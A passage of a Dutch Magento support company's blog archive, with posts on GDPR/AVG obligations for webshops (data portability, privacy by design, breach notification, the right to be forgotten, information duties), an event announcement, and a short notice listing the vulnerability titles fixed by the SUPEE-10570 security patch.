    4. Begin klein en doe ervaring op, daarna kan je geleidelijk uitbouwen. Zorg er wel voor dat je steeds een zelfstandig werkbaar stukje krijgt wat je kan gebruiken, wat ook wel ‘Minimal Viable product’ wordt genoemd.
    5. Zorg voor een vast aanspreekpunt bij de leveranciers als de offshoring partij. Hou de lijnen kort en duidelijk.
    6. Hou altijd de regie en communiceer. Zorgt dat je op de hoogte bent van alle zaken m.b.t. afwijkingen, vertraging, scope, etc…
    7. Vraag eventueel om een ‘Fixed Price’ traject waarbij de scope duidelijk en helder is en je mag verwachten dat het eigenlijk gebruik van het framework goed wordt toegepast
    8. Laat een derde partij zoals ‘SupportDesk’ meekijken en als Peer optreden zodat je zeker weet dat wat er wordt opgeleverd ook aan de wensen voldoet en onderhoudbaar is.
  • Dataportabiliteit: Impact GDPR / AVG op Magento shops

    AVG-GDPR 25 mei 2018Bijna iedereen heeft het wel eens meegemaakt; je staat op het punt een account te verwijderen (bijv. je Facebook of Apple account) omdat je wilt overstappen naar een andere aanbieder, maar uiteindelijk doe je dit toch niet. De reden; je verliest anders die dierbare foto’s, video’s en contacten, gegevens die organisaties koste wat kost niet uit hun platform laten gaan. En geef deze bedrijven eens ongelijk, veel klanten beslissen hierdoor toch maar bij hun huidige service aanbieder te blijven.

    Veel organisaties maken daarom dankbaar gebruik van deze “lock in” tactiek, om zo hun klanten te behouden. Met de introductie van het recht op dataportabiliteit in de Algemene Verordening Gegegevensbescherming (AVG), ook wel General Data Protection Regulation (GDPR) genoemd, wordt deze “lock in” tactiek tegengegaan.

    Dataportabiliteit volgens de AVG / GDPR

    In Artikel 20 van de Algemene verordening gegevensbescherming (AVG) wordt gesproken over het recht op overdraagbaarheid van gegevens, ook wel dataportabiliteit genoemd. Dit recht houdt in dat de betrokkene het recht heeft om persoonsgegevens, die hij aan een organisatie heeft verstrekt, in een gestructureerde, gangbare en machineleesbare vorm te ontvangen en deze aan een andere organisatie over te dragen. Als de consument hierom vraagt mag de organisatie dit proces niet hinderen of vertragen.

    De reden dat dit recht is geïntroduceerd is zodat consumenten hun persoonsgegevens makkelijker van de ene digitale omgeving naar de andere kunnen verplaatsen. Deze controle over persoonsgegevens moeten consumenten meer macht geven, een “lock-in” voorkomen en concurrentie tussen dienstverleners vergoten.

    Artikel 29-werkgroep

    De artikel 29-werkgroep is het onafhankelijke advies -en overlegorgaan van Europese Privacytoezichthouders, welke in april 2017 een richtlijnen hebben gepubliceerd over het recht op dataportabiliteit. Het doel hiervan is onder meer om organisaties meer informatie te verstrekken over de interpretatie en implementatie over dit recht.

    Toepassing van dataportabiliteit

    Consumenten hebben alleen het recht op overdraagbaarheid van hun gegevens als aan de twee onderstaande vereisten is voldaan:

    • 1. De verwerkingen berusten op de toestemming van de consument of een overeenkomst; en
    • 2. De persoonsgegevens moeten via geautomatiseerde procedés worden verwerkt. (papieren bestanden vallen dus niet onder dit recht)

    Bijvoorbeeld, zo vallen de films en series die jij op je online videodienst hebt bekeken onder het recht van dataportabiliteit, omdat deze gegevens worden verwerkt via een automatisch procedé en berusten op een overeenkomst die jij (de consument) hebt met de streamingdienst.De belastingdienst verwerkt ook gegevens van jou, namelijk voor het innen van diverse belastingen. Deze gegevens vallen echter niet onder de het recht op dataportabiliteit omdat de grondslag van de verwerkingen een wettelijke taak is van de belastingdienst en niet berust op toestemming of een overeenkomst.

    Welke persoonsgegevens moeten worden overgedragen?

    De persoonsgegevens die een organisatie moet verstrekken zijn:

    • 1. De persoonsgegevens over de consument (anonieme gegevens vallen hier niet onder)
    • 2. Persoonsgegevens die door de consument zelf zijn verstrekt. Deze groep kan worden onderverdeeld in twee categorieën.
      • Actief verstrekte gegevens. Dit zijn gegevens die de consument bewust overdraagt (bijvoorbeeld via een formulier op de website).
      • Gegevens die door het gebruik van de dienst door de consument zijn verstrekt. Hierbij kun je denken aan de zoekgeschiedenis, gebruiksgeschiedenis (zoals de films en series die jij hebt gekeken).

    Hoe moeten gegevens worden aangeleverd?

    Gegevens dienen door de onderneming in een gestructureerde, gangbare en machineleesbare vorm te worden verstuurd, verplaatst of gekopieerd te worden. Een standaardisatie van bepaalde formats en technieken is er echter nog niet. Organisaties moeten nu nog zelf bepalen hoe zij de gegevens van de consument overdragen aan de consument of een andere organisatie. De Europese Privacy adviesgroep (WP 29) adviseert echter wel een drietal punten om rekening mee te houden:

    • Een directe downloadmogelijkheid voor betrokkene
    • Een optie om gegevens direct door te kunnen sturen naar andere organisaties
    • Maatregelen om betrokkene te identificeren om misbruik te voorkomen

    Als niet gekozen wordt voor een directe download -of doorstuurmogelijkheid, dient de organisatie een andere manier ter beschikking te stellen voor dataportabiliteit. Het verzoek tot dataportabiliteit dient in ieder geval binnen een maand te worden ingewilligd. In moeilijke gevallen mag een organisatie het termijn verlengen tot drie maanden, zolang de consument en/of derde partij hiervan op de hoogte wordt gebracht.

    Wat heeft het recht op dataportabiliteit voor impact op mijn Magento shop?

    Het recht op dataportabiliteit brengt veel (technische) uitdagingen met zich mee voor de Magento front-end en Magento back-end.

    Magento Front-end

    Op de Magento front-end dien je jouw consumenten in elke geval te voorzien van de volgende mogelijkheden:

    • De mogelijkheid tot dataportabiliteit. Dit kan door de consument te voorzien van een directe downloadmogelijkheid waarmee de consument zelf zijn gegevens kan downloaden of kan versturen naar een andere organisatie. Indien dit niet wenselijk of mogelijk is voor jouw webshop dien je een andere optie aan te bieden, bijvoorbeeld via een aanvraag formulier.
    • Een manier om identificatie te checken. Je wilt er zeker van zijn dat niet iemand anders dan de klant zelf deze gegevens kan downloaden. Je kunt dit bijvoorbeeld doen door accountgegevens, ordernummers of lidmaatschapsnummers te gebruiken ter verificatie.
    • Informatie. In de AVG, of GDPR, staat informeren centraal. Zorg dat je op een duidelijk vindbare plek jouw klanten informeert over hun rechten.

    Magento Back-end

    In de Magento back-end draait het allemaal om het zo efficiënt en veilig mogelijk realiseren van het recht op dataportabiliteit. De Magento back end moet ervoor zorgen dat de wensen, aangegeven door jouw klanten op de front end, gerealiseerd worden. Hiervoor is het handig om de technieken in kaart te brengen die je wilt gebruiken voor:

    • Filteren van gegevens. In het kader van dataportabiliteit moeten persoonsgegevens worden onderscheiden van andere gegevens. Dit betekent dat gegevens die buiten de overdraagbaarheid vallen, zoals betalingsgegevens en wachtwoorden, niet mogen worden meegenomen in dit proces.
    • Direct downloaden. Welke technieken ga je inzetten zodat jouw klanten hun data direct kunnen downloaden? Het direct kunnen opvragen van deze persoonsgegevens is niet de enige uitdaging. Je dient dit ook aan te leveren in een gestructureerde, gangbare en machineleesbare vorm. Wat voor soort data format(ten) je hiervoor moet gebruiken ligt aan het soort gegevens die jij moet aanleveren, de standaarden in jouw branche en/of de wensen van de klant.
    • Beveiliging. Dit punt werd ook al aangestipt aan de front-end kant, maar om aan te geven hoe belangrijk dit wel niet is stippen we het hier nogmaals aan. Immers, Indien slecht beveiligd, is dit voor kwaadwillende natuurlijk een mooie nieuwe manier om aan de data van jouw klanten te komen. Welke technieken ga je gebruiken om ervoor te zorgen dat hier geen misbruik van kan worden gemaakt?

    Wij hopen dat deze blog je geholpen heeft inzicht te geven in wat er moet gebeuren om aan het recht op Dataportabilietit te voldoen, volgens de AVG / GDPR. Binnenkort posten wij nog een blog omtrent dit onderwerp waarin wij, aan de hand van showcases, jou laten zien hoe jij dit kan realiseren in jouw Magento shop.

    Wil je meer weten over wat jij, volgens de AVG/GDPR, allemaal op orde moet hebben in jouw Magento shop? Kijk dan voor meer informatie op onze eerste AVG / GDPR blog, hier worden alle relevante onderwerpen behandeld. Even sparren of advies op maat om voor 25 mei AVG compliant te zijn? Neem gerust contact met ons op.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Event- Impact AVG-GDPR op Magento webshops

    Impact AVG GDPR op Magento shopsWanneer: 12 april 2018 (16:00-20:00)
    Waar: Byte headquarters, Watertorenplein 4a, 1051PA Amsterdam

    Op 12 April organiseert SupportDesk hét event dat jouw Magento shop zal voorbereiden op 25 mei. Op die datum treedt de nieuwe privacywetgeving in werking, beter bekend als de “Algemene Verordening Gegevensbescherming” (AVG), of internationaal als “General Data Protection Regulation” (GDPR).

    Hoewel de inhoud van de verordening redelijk bekend is, zijn de implementaties voor Magento 1 en Magento 2 webshops verschillend en vaak nog onbekend. Om Magento shops hier zo goed mogelijk op voor te bereiden organiseert SupportDesk, met dank aan Byte, Buckaroo, Citadel, dit unieke event.

    Wat houdt de nieuwe privacywetgeving precies in? Wat gaat er voor jouw organisatie en Magento shop veranderen? Hoe kun je ervoor zorgen om voor 25 mei AVG compliant te zijn, en kun je je ook verzekeren voor de AVG? Diverse specialisten zullen op 12 april 2018 deze vragen (en nog vele andere) voor jou beantwoorden.

    Reserveer via deze link snel een ticket

    Het event vindt plaats op het hoofdkantoor van Byte en zal om 16:00 van start gaan. Vanaf 16:30 zullen sprekers van Byte, Buckaroo, Citadel en SupportDesk ingaan op de volgende onderwerpen:

    • De belangrijkste onderdelen van de AVG
    • Impact AVG op de Magento front-end & back-end
    • De rol van hostingpartijen
    • Payment Service Providers, wat moet je weten
    • Verzekeringen voor de AVG

    Meer informatie over het event kun je vinden op onze eventpagina. Heeft u vragen over dit event, neem dan gerust contact met ons op.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Magento Security Update SUPEE-10570

    securityreleaseMagento heeft op 27 februari een nieuwe patch vrijgegeven, SUPEE-10570, die een 19-tal veiligheidslekken lekken dicht in Magento 1 voor zowel de Open Source als de Commerce editie. Magento Commerce 1.14.3.8 en Magento Open Source 1.9.3.8 bevatten meerdere beveiligingsverbeteringen die helpen bij het afsluiten van ‘Remote code execution’ (RCE), ‘cross-site scripting’ (XSS) en andere problemen. Tevens bevat deze release ook kiene functionele fixes die, deze worden vermeld in de release notes.

    De 19 lekken van SUPEE-10570

    • APPSEC-1932: Remote Code Execution Using XML Injection
    • APPSEC-1938: Remote Code Execution - additional fix not included in SUPEE-9652
    • APPSEC-1964: Remote Code Execution by (semi-)arbitrary file deletion for admin users with access to Import.
    • APPSEC-2000: Remote Code Execution in Staging Environment
    • APPSEC-1944: Cross-Site Request Forgery in Store Backups [b]
    • APPSEC-1878/1890: Cross-site Scripting in CMS hierarchy
    • APPSEC-1908/1948: Cross-site Scripting in Custom Variables
    • APPSEC-1916: Cross-site Scripting in Attribute Group Name
    • APPSEC-1928: Cross-site Scripting in Downloadable Products
    • APPSEC-1945: Cross-site Scripting in Product SKU
    • APPSEC-1973: Cross-site Scripting in Newsletter Template
    • APPSEC-1873/1979/1980: Cross-site Scripting in Site Settings
    • APPSEC-1995: Cross-site Scripting in Downloadable Products
    • APPSEC-1889: Cross-Site Request Forgery Protection Bypass
    • APPSEC-1553: Access to Gift Registries of Other Users
    • APPSEC-1026: Session Management
    • APPSEC-1937: Insufficient privilege separation
    • APPSEC-1967: Password Change Session Management
    • APPSEC-1972: Password Reset Session Management

    Belangrijk!

    • Gebruik altijd de laatste versie van Magento Open Source (1.9.3.8) of Magento Commerce (1.14.3.8) om zo de nieuwste verbeteringen, features en beveiligingsupdates te krijgen.

    Wat moet ik doen om Magento Security issues te bestrijden?

    Wij onderschrijven Magento's advies om je software te updaten naar de laatste versie, Magento 1.9.3.8, dan wel SUPEE-10570 te installeren. Kom je vanaf een Magento versie vóór 1.9.3, en upgrade je naar 1.9.3.8, dan krijg je ook meteen de performance en algemene verbeteringen van de 1.9.3.0 upgrade erbij.

    Wij helpen u graag hiermee. Mail ons via het supportaanvraagformulier of bel ons op 020 337 59 61.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • AVG / GDPR: Privacy by design voor Magento shops

    AVG-GDPR 25 mei 2018Omdat webwinkels regelmatig persoonsgegevens verwerken is het van belang dat de nodige beschermingsmaatregelen worden getroffen. Daarom wordt er in de Algemene Verordening Gegegevensbescherming (AVG), of General Data Protection Regulation (GDPR), gesproken over Privacy by Design.

    Privacy by Design

    Privacy by Design en Privacy by Default worden vaak in één adem genoemd in de AVG GDPR, echter hebben deze verschillende betekenissen. Beide worden genoemd in artikel 25 van de AVG: “Gegevensbescherming door ontwerp en door standaardinstellingen”. De verschillen tussen deze twee begrippen worden hieronder toegelicht.

    Privacy by design. Letterlijk vertaald: ‘gegevensbescherming door ontwerp’. Het idee is dat het ontwerp van jouw (Magento 1, Magento 2) webshop, zowel op technisch als organisatorisch vlak, een zorgvuldige omgang met persoonsgegevens afdwingt. In de praktijk betekent dit dat een Magento shop zo ontworpen wordt dat je rekening houdt met de privacy-uitgangspunten van de AVG / GDPR.

    Privacy by Default is een onderdeel van Privacy by Design, welke zich focust op de standaardinstellingen rondom de privacy van persoonsgegevens. Privacy by Default gaat er vanuit dat de standaardinstellingen voor jouw klanten altijd zo privacy-vriendelijk mogelijk zijn. Je ziet dat deze twee termen er samen voor zorgen dat webshops niet alleen technisch en organisatorisch rekening moeten houden met de AVG, maar dit ook als standaardinstelling dienen te hanteren.

    Wat betekent Privacy by design voor mijn Magento shop?

    Stichting Internet Domeinregistratie Nederland (SIDN) heeft in samenwerking met andere partijen een Privacy by Design Framework ontwikkeld. Hieruit zijn 8 maatregelen voortgekomen waarmee jouw organisatie en Magento shop aan de eisen van Privacy by Design kunt voldoen. Deze zijn opgedeeld in 4 data- en 4 proces-georiënteerde strategieën. De acht maatregelen zijn:

    Data-georiënteerde strategieën

    • 1. Beperking van gegevensverwerking (dataminimalisatie)
      • Onder het mom van een strikt minimum van gegevensopslag en gegevensverwerkingen (richtlijn 39, AVG), dien je ervoor te zorgen dat je zo weinig mogelijk gegevens verwerkt. Bedenk goed welke gegevens je ‘echt nodig hebt, definieer voor welke doeleinden en zorg dat gegevens die je niet meer nodig hebt worden verwijderd. Meer over dataminimalisatie en bewaartermijnen kun je hier vinden.
    • 2. Bewaar gegevens gescheiden
      • Door verschillende persoonsgegevens van één persoon op verschillende databases/opslaglocaties te bewaren spreid je veel risico en verminder je de “betekenis” van deze data. Dit heeft meerdere voordelen:
      • i. Bij een hack liggen niet direct hele profielen van jouw klanten op straat.
      • ii. De losse gegevens (aparte databases) zeggen afzonderlijk weinig over elkaar
      • iii. Dit heeft ook invloed op je meldplicht bij datalekken.
    • 3. Abstraheer
      • Beperk zoveel mogelijk het detail waarin persoonsgegevens worden verwerkt. Aggregeer informatie over categorieën i.p.v. individuen en vat gedetailleerde informatie samen in meer algemene gegevens.
    • 4. Bescherm de gegevens die je hebt
      • Het beschermen van gegevens kun je doen door onder andere de volgende technieken in te zetten:
      • Pseudonimiseren. Pseudonimiseren is een Privacy Enhancing Technique (PET) waarmee het herleiden van persoonsgegevens naar individuen moeilijker wordt gemaakt. Pas met de juiste sleutel of aanvullende gegevens kunnen (persoons)gegevens ontsleuteld en leesbaar gemaakt worden, en zodoende worden herleid naar individuen.
      • Anonimiseren. Het wordt vaak verward met pseudonimiseren maar, vooral volgens de AVG / GDPR, heeft anonimiseren een hele andere betekenis. Het verschil ligt in het terug kunnen herleiden van gegevens, wat bij pseudonimiseren mogelijk is. Bij anonimiseren is dit niet meer mogelijk wat betekent dat persoonsgegevens, na toepassing van anonimiseren, niet meer te herleiden is. Deze data worden dus niet meer gezien als persoonsgegevens en vallen dus ook niet meer onder de AVG. Anonimiseren kun je gebruiken als je gegevens nog wilt bewaren voor bijvoorbeeld analytische of statistische doeleinden, maar herleide tot individuen niet langer noodzakelijk of rechtmatig is.
      • Het tijdig patchen van je Magento shop
      • Gebruik van verschillende encrypties

    Proces-georiënteerde strategieën

    • Informeer
      • Informeer gebruikers op een begrijpelijke manier over de verwerking van hun persoonsgegevens en wat jouw organisatie allemaal doet om hun gegevens veilig te stellen. Zorg dat jouw gebruikers gewaarschuwd worden als hun persoonsgegevens worden gebruikt, of als deze zijn gelekt. Wanneer je dit wel of niet moet melden aan de gebruiker kun je hier terugvinden.
    • 2. Geef controle
      • Wat een organisatie allemaal mag doen met persoonsgegevens is totaal afhankelijk van de consument. Geef gebruikers dan ook de controle over de verwerking van hun persoonsgegevens op jouw Magento shop. Vraag om toestemming, geef de mogelijkheid om dit in te trekken, te corrigeren of te verwijderen.
    • 3. Dwing af
      • Committeer je organisatie aan een privacy-vriendelijke verwerking van persoonsgegevens. Zorg dat jouw Magento shop privacy by default hanteert en dat dit via technische en organisatorische maatregelen wordt afgedwongen.
    • 4. Toon aan
      • Zorg dat je kunt aantonen dat je op een privacy-vriendelijke wijze, conform AVG normen, aan het werk bent. Zorg dat je log/register op orde is, doe regelmatig audits en rapporteer de resultaten. Je zou je eventueel zelfs kunnen laten certificeren.

    De Privacy by Design strategieën geven vooral een goed overzicht hoe jij, in grote lijnen, je organisatie moet inrichten om data zo veilig en anoniem mogelijk te houden, zoals; gegevens gescheiden bewaren, abstraheren, bBeschermen van gegevens. De andere strategieën staan verspreid in de AVG wetten en al beschreven als richtlijnen of verplichtingen; Dataminimalisatie, informatieverplichting, controle (rechten van consumenten), aantonen (verantwoordingsplicht). De implementatie van deze strategieën verschillen afhankelijk of je een Magento 1 of Magento 2 shop hebt. Als je hier eens over wilt sparren helpen wij je hier graag mee.

    Wil je meer weten over wat jij volgens de AVG / GDPR allemaal op orde moet hebben in jouw Magento shop? Kijk voor meer relevante onderwerpen op onze eerste blog. Even sparren of advies op maat? Neem gerust contact met ons op.

  • AVG / GDPR: Meldplicht datalekken voor Magento webshops

    AVG-GDPR 25 mei 2018Het College Bescherming Persoonsgegevens (CBP) is de instantie die toezicht houdt op naleving van de Wet Bescherming Persoonsgegevens (WBP) in Nederland. Tevens is dit ook de instantie waar men in, sommige gevallen, datalekken moet melden. Bij een datalek wordt snel aan een hack gedacht maar dit kan net zo goed een laptop met persoonsgegevens zijn die je bent kwijtgeraakt. Welke data is gelekt ,en op welke manier, bepaald aan wie (het CBP en/of je klanten) je dit moet melden. Vooral met de komst van de AVG GDPR is het belangrijk hier goed zich op te hebben. Wanneer geconstateerd wordt dat een datalek niet op de juiste manier is gemeld, kan het CBP een boete tot 500.000,- opleggen.

    In artikels 32-34 van de Algemene Verordening Gegevensbescherming (AVG) wordt diep ingegaan over de meldplichten van de organisatie naar de autoriteiten en consumenten bij datalekken. Echter, vanuit deze artikelen blijft het lastig om te bepalen wanneer iets wel of niet aan de CBP en/of de consument moet worden gemeld. ICTRecht heeft hiervoor een beslissingsboom ontwikkeld. Deze geeft jou hopelijk een beter beeld over jouw meldplicht en reduceert daarmee het risico op boetes.

    Beslisboom meldplicht datalekken

    De beslissingsboom laat zien dat een datalek niet altijd leidt tot een meldplicht aan autoriteiten en/of klanten. De meldplicht naar uw klanten komt vooral naar voren wanneer onbeveiligde (gevoelige) persoonsgegevens op straat komen te liggen. De “onbeveiligde gegevens” staat hierin centraal. Wanneer een datalek heeft plaatsgevonden maar de gegevens zijn door de encryptie alsnog niet leesbaar, dan hoeft u alleen te melden aan de toezichthouder.  Omdat een dergelijke melding aan uw klanten zware reputatieschade met zich mee kan brengen raden wij u aan goed te kijken naar de encryptie van uw klantgegevens. Meer informatie over het beveiligen van uw klantgegevens, en uw Magento shop in algemeen, kunt u in deze blog vinden.

    Wil je meer weten over wat jij volgens de AVG GDPR allemaal op orde moet hebben in jouw Magento shop? Kijk voor meer relevante onderwerpen op onze eerste blog. Advies op maat? Neem gerust contact met ons op.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • AVG / GDPR: Impact van het recht om vergeten te worden op Magento shops

    AVG-GDPR 25 mei 2018In de Algemene Verordening Gegevensbescherming (AVG) wordt in artikel 17 gesproken over het recht op gegevenswissing, ook wel “recht op vergetelheid” genoemd. Dit houdt in dat wanneer een consument aan u vraagt om vergeten te worden dat, in een aantal gevallen, u zijn persoonsgegevens moet verwijderen. De achterliggende gedachte bij dit recht is dat een consument de verwijdering van zijn gegevens kan vorderen indien zijn gegevens onrechtmatig zijn verwerkt. Ook wanneer er geen geldige reden meer is voor een organisatie om de gegevens te bewaren heeft de consument hier recht op. De periode dat een organisatie gegevens mag bewaren verschilt per verwerking en het doel voor deze verwerking. Hier kunt u meer over terugvinden het artikel “bewaartermijnen van persoonsgegevens”.

    Wanneer moet ik de gegevens van mijn klant(en) verwijderen?

    In artikel 17 van de AVG GDPR staat dat wanneer de consument zijn recht op gegevenswissing wilt gebruiken, de webshop verplicht is hier aan te voldoen om de volgende redenen:

    • De persoonsgegevens niet langer nodig zijn voor het doel waar deze voor zijn verzameld en/of verwerkt.
    • De consument trekt zijn verleende toestemming voor het verwerken van zijn persoonsgegevens in, en er is geen andere rechtsgrond voor het verwerken van zijn gegevens.
    • De consument bezwaar maakt tegen de verwerking van zijn gegevens en er zijn geen andere rechtsgronden om de gegevens te verwerken. Dit kan onder andere gebeuren wanneer er geen goede rechtsgronden zijn voor de verwerking. Denk daarom goed na over het doel van elke verwerking en of dit echt nodig is.
    • De persoonsgegevens zijn onrechtmatig verwerkt.
    • De persoonsgegevens moeten worden gewist om aan de wettelijke verplichtingen binnen de EU of lidstaat te voldoen.

    Er zijn dus een aantal gronden (hierboven) waarop de consument zich kan beroepen op zijn recht van vergetelheid. Hoelang mag een webshop hier over doen om dit te bewerkstelligen? In de AVG wordt gesproken over gegevenswissing “zonder onredelijke vertraging”. Je dient dit dus zo snel mogelijk te realiseren voor de consument, met uiterlijk een maand na verzoek als deadline. Iedere koppeling naar of kopie of reproductie van de persoonsgegevens van de consument moeten dan gewist worden. Staan deze gegevens ook bij derde partijen? Dan moeten deze ook ingelicht worden. Hierbij dient wel rekening te worden gehouden met de beschikbare techniek, de uitvoeringskosten en redelijkheid van de maatregelen.
    De consument kan echter niet altijd zijn recht om vergeten te worden uitoefenen. Dit geldt niet, volgens artikel 17 van de AVG, als de verwerking van gegevens nodig zijn om de volgende redenen:

    • “Voor het uitoefenen van het recht op vrijheid van meningsuiting en informatie”
    • Voor het nakomen van een wettelijke verwerkingsplicht binnen de EU.
    • “Om redenen van algemeen belang op het gebied van volksgezondheid”
    • “Met het oog op archivering in het algemeen belang, wetenschappelijk of historisch onderzoek of statistische doeleinden”
    • “Voor de instelling, uitoefening of onderbouwing van een rechtsvordering”

    Hoewel de consument veel gronden heeft om zijn gegevens te laten wissen is het geen absoluut recht. Er is expliciet belangenafweging opgenomen tussen de vrijheid om informatie te verwerken en recht op gegevenswissing (recht van vergetelheid), waar de consument zich op kan beroepen. Desalniettemin zal je enige aanpassingen moeten doen in jouw organisatie en Magento shop om jouw klanten, die de wens hebben vergeten te worden, te kunnen voorzien in hun rechten.

    Wat is de impact op de Magento front-end?

    Een van de belangrijkste grondbeginselen van de AVG GDPR is dat het intrekken van toestemming, het bezwaar maken tegen gegevensverwerkingen en andere manieren om je recht om vergeten te worden uit te oefenen, even makkelijk moet gaan als het toestemming ervoor geven. Dit betekent dat je op je Magentofront-end een aantal dingen op orde moet hebben:

    • Informeren van de klant.
      • Zorg dat op jouw Magento shop duidelijk wordt vermeld, bij het geven van toestemming en in je privacyverklaring, dat de consument ook het recht heeft om vergeten te worden. Onder het recht van informatieverplichting dien je ook aan te geven wie de klant kan benaderen als deze hier vragen over heeft.
    • Makkelijk proces maken.
      • Zorg dat jouw klanten op een makkelijke manier hun recht om vergeten te worden kunnen uitoefenen. Immers, als de consument met één enkel vinkje zijn toestemming kan geven, moet deze met hetzelfde gemak dit kunnen intrekken.

    Wat is de impact op de Magento back-end?

    In de Magento back-end en in de organisatie dien je ook de nodige maatregelen te treffen;

    • Register.
      • Omdat je aan de autoriteiten moet kunnen aantonen of je toestemming hebt verkregen om persoonsgegevens van een consument te verwerken, dien je hiervoor een register te hebben. Hierin kun je bijhouden (en aantonen) wanneer de consument toestemming heeft gegeven of deze heeft ingetrokken voor het verwerken van zijn persoonsgegevens.
    • Gegevensprocessen.
      • Het is raadzaam een overzicht te maken van al je processen die persoonsgegevens verwerken. Hierdoor krijg je overzicht waar welke data naartoe wordt gestuurd en waar deze worden opgeslagen. Met emailmarketing-, administratie-, payment provider- en andere tools staan de persoonsgegevens van jouw klanten al snel in meerdere databases. Bij het recht om vergeten te worden dient deze informatie, zover de techniek, kosten en moeite dit toelaten, overal verwijderd te worden.
    • Derde partijen.
      • Staat deze informatie bij een derde partij omdat je bijvoorbeeld de marketing en administratie heeft uitbesteedt, dan dien je deze partijen ook in te lichten. Om dit goed en conform AVG wetgeving te laten verlopen raden wij je aan gegevensverwerkingsovereenkomsten af te sluiten met dergelijke derde partijen. Hierin kun je afspreken bepaalde processen te automatiseren of bepaalde gegevens te anonimiseren, wat veel tijd kan besparen.

    Zowel op de Magento front-end als back-end zal je dus enige aanpassingen moeten maken. Het komt er, in dit deel van de AVG / GDPR, allemaal op neer dat jij de klant goed informeert over zijn “recht om vergeten te worden” en dat jij dit recht, middels een makkelijk proces en snel proces, voor de klant kunt realiseren.

    Wil je meer weten over wat jij volgens de AVG allemaal op orde moet hebben in jouw Magento shop? Kijk voor meer relevante onderwerpen op onze eerste blog. Advies op maat? Neem gerust contact met ons op.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • AVG / GDPR: Impact informatieverplichting naar de consument op Magento shops

    AVG-GDPR 25 mei 2018Onder de Europese Algemene verordening gegevensbescherming (AVG), of General Data Protection Regulation (GDPR), dien jij transparant te communiceren naar jouw klanten van wie jij persoonsgegevens verwerkt. Dit houdt in dat jij duidelijk moet vermelden dat (persoons) gegevens van jouw klanten worden verzameld, verwerkt of op een andere manier worden gebruikt. Ook is het van belang dat de klant geïnformeerd wordt over zijn rechten en op welke wijze deze kunnen uitgeoefend kunnen worden.

    De AVG / GDPR legt hiermee alle verantwoordelijkheid bij de organisaties die gegevens van hun klanten verwerken. Maar welke informatie ben je verplicht te delen met jouw klanten, wanneer moet je dit delen en wat is de impact jouw Magento shop hiervan? In afdeling 2 artikel 13-15 van de AVG wordt uitgebreid ingegaan op de informatie die je moet delen.

    Informatieverplichting volgens de AVG / GDPR

    Het is de taak van de webwinkelier om klanten, van wie (persoons)gegevens worden verzameld, te informeren over wat er precies met die gegevens wordt gedaan en wat voor rechten zij hebben. Artikel 13 van de AVG geeft als volgt aan welke informatie verstrekt moet worden:

    • 1. De identiteit en contactgegevens van de organisatie. De klant moet weten hoe hij contact met je op kan nemen.
    • 2. Indien aanwezig, de contactgegevens van de Data Protection Officer (DPO). Of u een DPO nodig heeft kunt u hier terugvinden.
    • 3. Het doel waarvoor de persoonsgegevens verzameld worden en op welke rechtsgrond dit gebaseerd is.
      • Ook op rechtsgronden waarvoor je geen toestemming van de klant nodig hebt voor het verwerken van zijn persoonsgegevens (gerechtvaardigd belang), dien jij deze wel te informeren. Voor gerechtvaardigde belangen (het verwerken van persoonsgegevens waar geen toestemming voor nodig is) dien je dus wel aan te geven wat dit belang is.
    • 4. Indien informatie wordt doorgegeven, opgeslagen of verwerkt door derden; welke maatregelen zijn genomen om privacy te waarborgen, waar een kopie kan worden verkregen of waar ze kunnen worden geraadpleegd.
      • Indien het derden partijen buiten de EU betreffen, dient extra goed gelet te worden op de waarborging van hoe gegevens conform de AVG worden verwerkt.
      • Hiervoor kunnen dataverwerkingsovereenkomsten gebruikt worden.
    • 5. Informatie over de periode gedurende welke persoonsgegevens zullen worden opgeslagen, of indien dat niet mogelijk is, de criteria ter bepaling van die termijnen. hoelang wil jij gegevens van jouw klanten bewaren en voor welk doel? Meer hierover kunt u teruglezen in de blog over bewaartermijnen.
    • 6. Informatie over de rechten van de klant en de manier hoe deze kan vragen om inzage, rectificatie of het wissen van zijn verzamelde gegevens. Ook dient duidelijk vermeld te worden waar klachten ingediend kunnen worden en waar bezwaar kan worden gemaakt.
      • Het recht om gegevens te wissen wordt ook het “Recht om vergeten te worden” genoemd. Hier hierover kunt u in deze blog lezen.
    • 7. De klant heeft ten alle tijden het recht heeft om zijn toestemming in te trekken, zonder dat dit afbreuk doet op de rechtmatigheid van de verwerking, op basis van toestemming voor de intrekking.
    • 8. Het informeren van de klant dat hij het recht heeft om een klacht in te dienen bij een toezichthoudende autoriteit.
    • 9. Het vermelden of het verstrekken van persoonsgegevens een wettelijke of contractuele verplichting is of een noodzakelijk voorwaarde is om een overeenkomst te sluiten. Ook moet duidelijk vermeld worden wat de mogelijke gevolgen zijn wanneer deze gegevens niet worden verstrekt.
      • Denk hierbij aan het eisen van leeftijdsgegevens voor het verkopen van bijvoorbeeld alcohol. Het is een noodzakelijke voorwaarde om tot een overeenkomst (koop) te komen. Je bent immers wettelijk verplicht te kunnen aantonen dat je alcohol hebt verkocht aan iemand die ten minste 18 jaar is. Een mogelijk gevolg kan dus zijn dat, wanneer de klant weigert zijn leeftijd op te geven, deze geen toegang tot de shop krijgt of geen producten mag bestellen.
    • 10. Indien gebruik wordt gemaakt van geautomatiseerde besluitvorming dient je een uitleg te geven over de onderliggende logica, het belang van deze verwerkingsvorm en de verwachte gevolgen van die verwerking voor de klant.
      • Verstrek je bijvoorbeeld kredieten, online via je Magento shop, en worden deze beslissingen automatisch gemaakt op basis van de verstrekte persoonsgegevens? Dan dien je dus informatie te verstrekken over de werking van dit proces en het belang ervan.
